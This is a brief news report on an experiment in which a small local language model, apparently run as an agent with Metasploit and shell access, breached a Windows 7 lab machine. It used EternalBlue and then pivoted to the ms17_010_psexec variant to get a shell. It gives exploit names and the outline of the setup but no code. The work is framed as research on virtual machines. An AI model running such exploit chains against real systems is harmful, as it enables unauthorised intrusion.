A researcher has demonstrated that small-scale language models running locally can successfully execute known cybersecurity exploits against legacy systems.
In an experiment detailed on thepatrickfisher.com, developer Patrick Fisher used a Qwen3.5 9B NVFP4 model to attempt to penetrate virtual machines running Windows XP and Windows 7. The test was conducted for research and entertainment purposes using a local setup.
Fisher configured the test using vLLM running in Windows Subsystem for Linux (WSL) on a laptop equipped with an RTX 5080 GPU and 16GB of VRAM. This hardware allowed the model to run with a full 256K context window.
The setup included a custom 'vibe coded' agent with full command-line access, web search capabilities, and integration with the Metasploit framework. The agent's web search functionality was enabled via a specific variable, `QWEN_ENABLE_WEB_TOOLS`, set to 1.
Initially, Fisher attempted to target a Windows XP SP1 machine. However, the experiment transitioned from VirtualBox to VMware Workstation to improve performance during the testing process.
While the initial attempt to exploit the Windows XP SP1 machine failed, the model successfully breached a Windows 7 Ultimate target. Fisher noted that the initial failure with XP appeared to be due to the exploit no longer working as expected.
Upon targeting the Windows 7 instance, the Qwen3.5 9B model utilized the EternalBlue (ms17-010) exploit. The agent autonomously issued multiple commands to the `msfconsole` to configure the exploit, set the remote host, and manage the payload.
After the primary EternalBlue attempt encountered issues, the agent pivoted to the `ms17_010_psexec` variant. This secondary approach successfully established a connection, allowing the model to achieve shell access on the target system.
Fisher highlighted the potential of smaller, localized models for such tasks, stating, "I want to highlight what small models can do for someone and what they are already capable of."
He also observed the potential for continuous, automated exploitation, describing the possibility of a model looping endlessly "like some braindead zombie banging on the doors."